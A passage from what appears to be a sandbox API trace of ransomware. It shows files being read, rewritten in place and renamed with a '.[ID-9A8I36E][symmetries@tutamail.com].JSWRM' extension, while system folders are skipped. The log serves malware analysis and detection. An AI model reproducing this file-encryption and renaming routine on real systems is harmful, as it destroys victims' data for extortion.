lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0077.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0077.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0077.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0077.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0077.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.472] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0077.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0077.472] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2afa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00414_.WMF", cAlternateFileName="")) returned 1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2=".") returned 1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="..") returned 1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="...") returned 1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="windows") returned -1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="recovery") returned -1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="perflogs") returned -1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="documents and settings") returned 1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.472] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="system volume information") returned -1 [0077.473] lstrcmpiW (lpString1="FD00414_.WMF", lpString2="msocache") returned -1 [0077.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0077.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00414_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0077.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0077.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00414_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0077.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.474] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11002) returned 1 [0077.474] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2af0) returned 0x24d210 [0077.474] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2af0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2af0, lpOverlapped=0x0) returned 1 [0077.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.475] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2af0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2af0, lpOverlapped=0x0) returned 1 [0077.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.476] CloseHandle (hObject=0x314) returned 1 [0077.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0077.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0077.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0077.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0077.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0077.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0077.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0077.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0077.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.477] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x400c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00419_.WMF", cAlternateFileName="")) returned 1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2=".") returned 1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="..") returned 1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="...") returned 1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="windows") returned -1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="recovery") returned -1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="perflogs") returned -1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="documents and settings") returned 1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="system volume information") returned -1 [0077.477] lstrcmpiW (lpString1="FD00419_.WMF", lpString2="msocache") returned -1 [0077.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0077.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00419_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0077.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0077.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00419_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0077.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0077.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0077.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.477] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16396) returned 1 [0077.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4000) returned 0x24d210 [0077.478] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4000, lpOverlapped=0x0) returned 1 [0077.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.480] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4000, lpOverlapped=0x0) returned 1 [0077.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.480] CloseHandle (hObject=0x314) returned 1 [0077.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0077.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0077.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0077.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0077.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0077.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0077.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0077.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0077.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0077.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0077.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.481] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00428_.WMF", cAlternateFileName="")) returned 1 [0077.481] lstrcmpiW (lpString1="FD00428_.WMF", lpString2=".") returned 1 [0077.481] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="..") returned 1 [0077.481] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="...") returned 1 [0077.481] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="windows") returned -1 [0077.481] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="recovery") returned -1 [0077.482] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="perflogs") returned -1 [0077.482] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="documents and settings") returned 1 [0077.482] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.482] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="system volume information") returned -1 [0077.482] lstrcmpiW (lpString1="FD00428_.WMF", lpString2="msocache") returned -1 [0077.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00428_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00428_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00428_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0077.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00428_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00428_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00428_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0077.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0077.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.524] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4796) returned 1 [0077.524] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12b0) returned 0x205850 [0077.524] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12b0, lpOverlapped=0x0) returned 1 [0077.526] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.526] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12b0, lpOverlapped=0x0) returned 1 [0077.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0077.526] CloseHandle (hObject=0x314) returned 1 [0077.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0077.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0077.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0077.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0077.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0077.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0077.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.527] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0077.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0077.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.527] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, 